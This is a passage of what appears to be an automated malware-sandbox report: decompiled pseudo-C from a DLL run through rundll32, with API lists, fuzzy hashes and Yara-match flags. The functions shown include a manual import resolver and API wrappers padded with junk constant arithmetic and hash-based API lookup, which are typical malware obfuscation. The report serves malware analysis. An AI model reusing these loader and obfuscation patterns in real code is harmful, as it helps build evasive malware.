                                                                                                        • API String ID: 3444012488-3668843792
                                                                                                        • Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                        • Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
                                                                                                        • Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                        • Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
                                                                                                        				void* _v8;
                                                                                                        				intOrPtr* _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				signed int* _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				intOrPtr _t114;
                                                                                                        				intOrPtr _t116;
                                                                                                        				intOrPtr _t133;
                                                                                                        				intOrPtr _t138;
                                                                                                        				void* _t202;
                                                                                                        				void* _t203;
                                                                                                        
                                                                                                        				_v44 = __ecx;
                                                                                                        				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                        				_v16 = 1;
                                                                                                        				_v12 =  *_a4 + 0x80;
                                                                                                        				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                        					_v8 = _v20 +  *_v12;
                                                                                                        					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                        						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        						_t203 = _t202 + 8;
                                                                                                        						_v36 = _t114;
                                                                                                        						if(_v36 != 0) {
                                                                                                        							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
                                                                                                        							_t202 = _t203 + 8;
                                                                                                        							_v28 = _t116;
                                                                                                        							if(_v28 != 0) {
                                                                                                        								 *((intOrPtr*)(_a4 + 8)) = _v28;
                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
                                                                                                        								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
                                                                                                        								if( *_v8 == 0) {
                                                                                                        									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        								} else {
                                                                                                        									_v32 = _v20 +  *_v8;
                                                                                                        									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        								}
                                                                                                        								while( *_v32 != 0) {
                                                                                                        									if(( *_v32 & 0x80000000) == 0) {
                                                                                                        										_v40 = _v20 +  *_v32;
                                                                                                        										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        										_t202 = _t202 + 0xc;
                                                                                                        										 *_v24 = _t133;
                                                                                                        									} else {
                                                                                                        										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        										_t202 = _t202 + 0xc;
                                                                                                        										 *_v24 = _t138;
                                                                                                        									}
                                                                                                        									if( *_v24 != 0) {
                                                                                                        										_v32 =  &(_v32[1]);
                                                                                                        										_v24 = _v24 + 4;
                                                                                                        										continue;
                                                                                                        									} else {
                                                                                                        										_v16 = 0;
                                                                                                        										break;
                                                                                                        									}
                                                                                                        								}
                                                                                                        								if(_v16 != 0) {
                                                                                                        									_v8 = _v8 + 0x14;
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        								SetLastError(0x7f);
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        							SetLastError(0xe);
                                                                                                        							_v16 = 0;
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						SetLastError(0x7e);
                                                                                                        						_v16 = 0;
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					return _v16;
                                                                                                        				}
                                                                                                        				return 1;
                                                                                                        			}



















                                                                                                        0x10002676
                                                                                                        0x1000267f
                                                                                                        0x10002682
                                                                                                        0x10002693
                                                                                                        0x1000269d
                                                                                                        0x100026b1
                                                                                                        0x100026bf
                                                                                                        0x100026f7
                                                                                                        0x100026f9
                                                                                                        0x100026fc
                                                                                                        0x10002703
                                                                                                        0x1000272e
                                                                                                        0x10002733
                                                                                                        0x10002736
                                                                                                        0x1000273d
                                                                                                        0x1000276f
                                                                                                        0x10002781
                                                                                                        0x10002790
                                                                                                        0x10002799
                                                                                                        0x100027bd
                                                                                                        0x100027c9
                                                                                                        0x1000279b
                                                                                                        0x100027a3
                                                                                                        0x100027af
                                                                                                        0x100027af
                                                                                                        0x100027e0
                                                                                                        0x100027f3
                                                                                                        0x10002825
                                                                                                        0x10002840
                                                                                                        0x10002842
                                                                                                        0x10002848
                                                                                                        0x100027f5
                                                                                                        0x10002811
                                                                                                        0x10002813
                                                                                                        0x10002819
                                                                                                        0x10002819
                                                                                                        0x10002850
                                                                                                        0x100027d4
                                                                                                        0x100027dd
                                                                                                        0x00000000
                                                                                                        0x10002852
                                                                                                        0x10002852
                                                                                                        0x00000000
                                                                                                        0x10002852
                                                                                                        0x10002850
                                                                                                        0x10002864
                                                                                                        0x100026bc
                                                                                                        0x00000000
                                                                                                        0x100026bc
                                                                                                        0x10002877
                                                                                                        0x1000287e
                                                                                                        0x00000000
                                                                                                        0x1000287e
                                                                                                        0x10002750
                                                                                                        0x10002757
                                                                                                        0x1000275d
                                                                                                        0x00000000
                                                                                                        0x1000275d
                                                                                                        0x10002707
                                                                                                        0x1000270d
                                                                                                        0x00000000
                                                                                                        0x1000270d
                                                                                                        0x00000000
                                                                                                        0x1000288b
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
                                                                                                        • SetLastError.KERNEL32(0000007E), ref: 10002707
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 4100373531-0
                                                                                                        • Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                        • Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
                                                                                                        • Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                        • Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                                                                        				void* __edi;
                                                                                                        				struct _CRITICAL_SECTION* _t4;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				signed int _t11;
                                                                                                        				void* _t14;
                                                                                                        				intOrPtr* _t15;
                                                                                                        				void* _t17;
                                                                                                        
                                                                                                        				_t17 = __ebp;
                                                                                                        				_t14 = __esi;
                                                                                                        				_t7 = __ebx;
                                                                                                        				_t11 = _a4;
                                                                                                        				_t20 = _t11 - 0x11;
                                                                                                        				if(_t11 >= 0x11) {
                                                                                                        					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
                                                                                                        				}
                                                                                                        				if( *0x1005aac0 == 0) {
                                                                                                        					_t4 = E100142F7();
                                                                                                        				}
                                                                                                        				_push(_t7);
                                                                                                        				_push(_t17);
                                                                                                        				_push(_t14);
                                                                                                        				_t15 = 0x1005ac78 + _t11 * 4;
                                                                                                        				if( *_t15 == 0) {
                                                                                                        					EnterCriticalSection(0x1005ac60);
                                                                                                        					if( *_t15 == 0) {
                                                                                                        						_t4 = 0x1005aac8 + _t11 * 0x18;
                                                                                                        						InitializeCriticalSection(_t4);
                                                                                                        						 *_t15 =  *_t15 + 1;
                                                                                                        					}
                                                                                                        					LeaveCriticalSection(0x1005ac60);
                                                                                                        				}
                                                                                                        				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
                                                                                                        				return _t4;
                                                                                                        			}











                                                                                                        0x1001431b
                                                                                                        0x1001431b
                                                                                                        0x1001431b
                                                                                                        0x1001431c
                                                                                                        0x10014320
                                                                                                        0x10014323
                                                                                                        0x10014325
                                                                                                        0x10014325
                                                                                                        0x10014331
                                                                                                        0x10014333
                                                                                                        0x10014333
                                                                                                        0x10014338
                                                                                                        0x1001433f
                                                                                                        0x10014340
                                                                                                        0x10014341
                                                                                                        0x10014350
                                                                                                        0x10014357
                                                                                                        0x1001435c
                                                                                                        0x10014363
                                                                                                        0x10014366
                                                                                                        0x1001436c
                                                                                                        0x1001436c
                                                                                                        0x10014373
                                                                                                        0x10014373
                                                                                                        0x1001437f
                                                                                                        0x10014385

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                        • InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                        • LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2895727460-0
                                                                                                        • Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                        • Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
                                                                                                        • Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                        • Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001398E(long* __ecx, signed int _a4) {
                                                                                                        				void* _t9;
                                                                                                        				struct _CRITICAL_SECTION* _t12;
                                                                                                        				signed int _t14;
                                                                                                        				long* _t16;
                                                                                                        
                                                                                                        				_t16 = __ecx;
                                                                                                        				_t1 =  &(_t16[7]); // 0x1005aaa8
                                                                                                        				_t12 = _t1;
                                                                                                        				EnterCriticalSection(_t12);
                                                                                                        				_t14 = _a4;
                                                                                                        				if(_t14 <= 0) {
                                                                                                        					L5:
                                                                                                        					LeaveCriticalSection(_t12);
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				_t3 =  &(_t16[3]); // 0x3
                                                                                                        				if(_t14 >=  *_t3) {
                                                                                                        					goto L5;
                                                                                                        				}
                                                                                                        				_t9 = TlsGetValue( *_t16);
                                                                                                        				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                                                                        					goto L5;
                                                                                                        				} else {
                                                                                                        					LeaveCriticalSection(_t12);
                                                                                                        					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                                                                        				}
                                                                                                        			}







                                                                                                        0x10013990
                                                                                                        0x10013993
                                                                                                        0x10013993
                                                                                                        0x10013997
                                                                                                        0x1001399d
                                                                                                        0x100139a3
                                                                                                        0x100139cc
                                                                                                        0x100139cd
                                                                                                        0x00000000
                                                                                                        0x100139d3
                                                                                                        0x100139a5
                                                                                                        0x100139a8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100139ac
                                                                                                        0x100139b4
                                                                                                        0x00000000
                                                                                                        0x100139bb
                                                                                                        0x100139c2
                                                                                                        0x00000000
                                                                                                        0x100139c8

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
                                                                                                        • TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
                                                                                                        • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
                                                                                                        • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3969253408-0
                                                                                                        • Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                        • Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
                                                                                                        • Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                        • Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 485 6c52b9-6c5385 call 6dfe29 call 6ceb52 LoadLibraryW
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E006C52B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t47;
                                                                                                        				struct HINSTANCE__* _t59;
                                                                                                        				signed int _t61;
                                                                                                        				signed int _t62;
                                                                                                        				WCHAR* _t68;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t68 = __ecx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E006DFE29(_t47);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v28 = 0x68392e;
                                                                                                        				_v16 = 0xf5950b;
                                                                                                        				_v16 = _v16 ^ 0xb3325752;
                                                                                                        				_v16 = _v16 ^ 0xe58473b2;
                                                                                                        				_v16 = _v16 ^ 0x56462a2c;
                                                                                                        				_v8 = 0x3988bb;
                                                                                                        				_t61 = 0x3a;
                                                                                                        				_v8 = _v8 / _t61;
                                                                                                        				_v8 = _v8 + 0xf338;
                                                                                                        				_v8 = _v8 << 5;
                                                                                                        				_v8 = _v8 ^ 0x0035ea14;
                                                                                                        				_v12 = 0xe53120;
                                                                                                        				_v12 = _v12 ^ 0xa236e8c8;
                                                                                                        				_t62 = 0x62;
                                                                                                        				_v12 = _v12 / _t62;
                                                                                                        				_v12 = _v12 ^ 0x01ab7b97;
                                                                                                        				_v20 = 0x973198;
                                                                                                        				_v20 = _v20 * 0x60;
                                                                                                        				_v20 = _v20 ^ 0x38bce55b;
                                                                                                        				E006CEB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
                                                                                                        				_t59 = LoadLibraryW(_t68); // executed
                                                                                                        				return _t59;
                                                                                                        			}














                                                                                                        0x006c52c0
                                                                                                        0x006c52c3
                                                                                                        0x006c52c5
                                                                                                        0x006c52c8
                                                                                                        0x006c52cc
                                                                                                        0x006c52cd
                                                                                                        0x006c52d2
                                                                                                        0x006c52d9
                                                                                                        0x006c52e2
                                                                                                        0x006c52e9
                                                                                                        0x006c52f0
                                                                                                        0x006c52f7
                                                                                                        0x006c52fe
                                                                                                        0x006c530a
                                                                                                        0x006c530f
                                                                                                        0x006c5314
                                                                                                        0x006c531b
                                                                                                        0x006c531f
                                                                                                        0x006c5326
                                                                                                        0x006c532d
                                                                                                        0x006c5337
                                                                                                        0x006c533f
                                                                                                        0x006c5342
                                                                                                        0x006c5349
                                                                                                        0x006c5360
                                                                                                        0x006c5363
                                                                                                        0x006c5376
                                                                                                        0x006c537f
                                                                                                        0x006c5385

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID: 1$,*FV$.9h
                                                                                                        • API String ID: 1029625771-1870595533
                                                                                                        • Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                        • Instruction ID: 011269c6a7b870f1ab20bac1acaedef3fb3758a05cd96a0a2b72c0b1f1b42572
                                                                                                        • Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                        • Instruction Fuzzy Hash: D82153B6D01208FBEF08DFA8D94A9EEBBB5FB40304F108199E815A6251E3B55B14DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E006E1538(void* __ecx, void* __edx, void* _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t59;
                                                                                                        				int _t75;
                                                                                                        				signed int _t77;
                                                                                                        				signed int _t78;
                                                                                                        				signed int _t79;
                                                                                                        				signed int _t80;
                                                                                                        
                                                                                                        				_push(_a4);
                                                                                                        				E006DFE29(_t59);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0x73095a;
                                                                                                        				_v28 = 0xd34a52;
                                                                                                        				_v16 = 0xb3a153;
                                                                                                        				_t77 = 0x73;
                                                                                                        				_v16 = _v16 / _t77;
                                                                                                        				_v16 = _v16 + 0x4fd2;
                                                                                                        				_v16 = _v16 ^ 0xee3af97f;
                                                                                                        				_v16 = _v16 ^ 0xee3510f4;
                                                                                                        				_v20 = 0xee2064;
                                                                                                        				_v20 = _v20 << 0xe;
                                                                                                        				_v20 = _v20 ^ 0x88190a0a;
                                                                                                        				_v12 = 0x72c7a5;
                                                                                                        				_v12 = _v12 + 0x7839;
                                                                                                        				_t78 = 0x77;
                                                                                                        				_v12 = _v12 / _t78;
                                                                                                        				_t79 = 0x76;
                                                                                                        				_v12 = _v12 / _t79;
                                                                                                        				_v12 = _v12 ^ 0x00040652;
                                                                                                        				_v8 = 0x10c7fb;
                                                                                                        				_t80 = 0x6c;
                                                                                                        				_v8 = _v8 * 0x70;
                                                                                                        				_v8 = _v8 << 8;
                                                                                                        				_v8 = _v8 / _t80;
                                                                                                        				_v8 = _v8 ^ 0x00c83f8f;
                                                                                                        				E006CEB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
                                                                                                        				_t75 = FindCloseChangeNotification(_a4); // executed
                                                                                                        				return _t75;
                                                                                                        			}
















                                                                                                        0x006e153e
                                                                                                        0x006e1543
                                                                                                        0x006e1548
                                                                                                        0x006e154f
                                                                                                        0x006e1558
                                                                                                        0x006e155f
                                                                                                        0x006e156b
                                                                                                        0x006e1570
                                                                                                        0x006e1575
                                                                                                        0x006e157c
                                                                                                        0x006e1583
                                                                                                        0x006e158a
                                                                                                        0x006e1591
                                                                                                        0x006e1595
                                                                                                        0x006e159c
                                                                                                        0x006e15a3
                                                                                                        0x006e15ad
                                                                                                        0x006e15b2
                                                                                                        0x006e15ba
                                                                                                        0x006e15bf
                                                                                                        0x006e15c4
                                                                                                        0x006e15cb
                                                                                                        0x006e15d6
                                                                                                        0x006e15e6
                                                                                                        0x006e15e9
                                                                                                        0x006e15f3
                                                                                                        0x006e15f6
                                                                                                        0x006e160a
                                                                                                        0x006e1615
                                                                                                        0x006e161a

                                                                                                        APIs
                                                                                                        • FindCloseChangeNotification.KERNEL32(00040652), ref: 006E1615
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                        • String ID: Zs$d
                                                                                                        • API String ID: 2591292051-3879001491
                                                                                                        • Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                        • Instruction ID: 3304d531757b69fe196bd7e33685809e2cd2a4a8aedc5730d1a8560b7949681f
                                                                                                        • Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                        • Instruction Fuzzy Hash: 15212CB5D40209FBEB04DFA5D94A99DBBB2EB40314F10C09DE614B7250D7B95B548F84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 530 6cd061-6cd14b call 6dfe29 call 6ceb52 DeleteFileW
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E006CD061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t54;
                                                                                                        				int _t63;
                                                                                                        				signed int _t65;
                                                                                                        				WCHAR* _t69;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t69 = __ecx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E006DFE29(_t54);
                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v36 = 0xa62646;
                                                                                                        				_v32 = 0x27199b;
                                                                                                        				_v20 = 0x942c55;
                                                                                                        				_v20 = _v20 | 0xf0368afe;
                                                                                                        				_v20 = _v20 << 0xa;
                                                                                                        				_v20 = _v20 ^ 0xfbcaf84d;
                                                                                                        				_v20 = _v20 ^ 0x217d6c33;
                                                                                                        				_v16 = 0xf28622;
                                                                                                        				_v16 = _v16 >> 0xe;
                                                                                                        				_v16 = _v16 | 0xeb4a9877;
                                                                                                        				_v16 = _v16 ^ 0x2aded5e4;
                                                                                                        				_v16 = _v16 ^ 0xc19eb21f;
                                                                                                        				_v12 = 0x4a5837;
                                                                                                        				_v12 = _v12 ^ 0xa3e571b7;
                                                                                                        				_v12 = _v12 + 0xffff6305;
                                                                                                        				_t65 = 0x6e;
                                                                                                        				_v12 = _v12 / _t65;
                                                                                                        				_v12 = _v12 ^ 0x01794185;
                                                                                                        				_v8 = 0xa209ee;
                                                                                                        				_v8 = _v8 + 0x62d2;
                                                                                                        				_v8 = _v8 ^ 0x3d892cf6;
                                                                                                        				_v8 = _v8 | 0x5ca7d1ce;
                                                                                                        				_v8 = _v8 ^ 0x7da8dabc;
                                                                                                        				E006CEB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
                                                                                                        				_t63 = DeleteFileW(_t69); // executed
                                                                                                        				return _t63;
                                                                                                        			}















                                                                                                        0x006cd068
                                                                                                        0x006cd06b
                                                                                                        0x006cd06d
                                                                                                        0x006cd070
                                                                                                        0x006cd074
                                                                                                        0x006cd075
                                                                                                        0x006cd07a
                                                                                                        0x006cd081
                                                                                                        0x006cd087
                                                                                                        0x006cd08e
                                                                                                        0x006cd095
                                                                                                        0x006cd09c
                                                                                                        0x006cd0a3
                                                                                                        0x006cd0a7
                                                                                                        0x006cd0ae
                                                                                                        0x006cd0b5
                                                                                                        0x006cd0bc
                                                                                                        0x006cd0c0
                                                                                                        0x006cd0c7
                                                                                                        0x006cd0ce
                                                                                                        0x006cd0d5
                                                                                                        0x006cd0dc
                                                                                                        0x006cd0e3
                                                                                                        0x006cd0ef
                                                                                                        0x006cd0f7
                                                                                                        0x006cd0fa
                                                                                                        0x006cd101
                                                                                                        0x006cd108
                                                                                                        0x006cd10f
                                                                                                        0x006cd116
                                                                                                        0x006cd11d
                                                                                                        0x006cd13c
                                                                                                        0x006cd145
                                                                                                        0x006cd14b

                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 006CD145
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
